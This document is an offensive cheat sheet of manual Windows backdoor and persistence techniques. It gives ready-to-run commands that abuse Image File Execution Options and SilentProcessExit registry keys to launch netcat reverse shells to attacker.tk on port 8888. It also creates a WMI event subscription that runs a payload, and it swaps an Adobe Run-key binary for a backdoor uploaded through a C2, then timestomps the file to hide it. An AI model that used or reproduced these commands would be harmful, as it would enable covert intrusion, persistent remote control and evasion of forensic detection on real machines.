Manual Backdoors

1:

copy calc.exe _calc.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d "cmd /C _calc.exe & c:\windows\nc.exe -e c:\windows\system32\cmd.exe attacker.tk 8888" /f`

2:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "nc -e \windows\system32\cmd.exe attacker.tk 8888"

3:

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="persistence", ExecutablePath="C:\users\admin\meter.exe",CommandLineTemplate="C:\users\admin\meter.exe"

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="persistence"", Consumer="CommandLineEventConsumer.Name="persistence""

4:

We'll simply inject a well-placed and seemingly benign executable, replacing an existing executable with our own backdoor.

While there are many registry keys that allow programs to execute at start time, most software vendors opt for the classic Run key. We query the Run key with the following command:

reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

This gives us a bunch of binaries to target. For example, if we decide to overwrite AGCInvokerUtility.exe with a custom backdoor (for example, a PowerShell script agent generated with Empire), we should rename it to bear the same name.

cp backdoor AGCInvokerUtility

Then we switch to our C2 and upload it:

cd "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility"

upload AGCInvokerUtility.exe

To make our executable blend in more, we'll change its modification, access, and creation (MAC) times to the times shown by the original binary. First we get the MAC attributes of the old binary:

Get-Item AGCInvokerUtility_old.exe | select creationtime, lastaccesstime, lastwritetime

Then we set these data values for the new binary (Example: Previous command returns 02/12/2013 12:31 in CreationTime, LastAccessTime and LastWriteTime):

powershell $(get-item AGCInvokerUtility.exe).crationtime=$(get-date '02/12/2013 12:31')

powershell $(get-item AGCInvokerUtility.exe).lastaccesstime=$(get-date '02/12/2013 12:31')

powershell $(get-item AGCInvokerUtility.exe).lastwritetime=$(get-date '02/12/2013 12:31')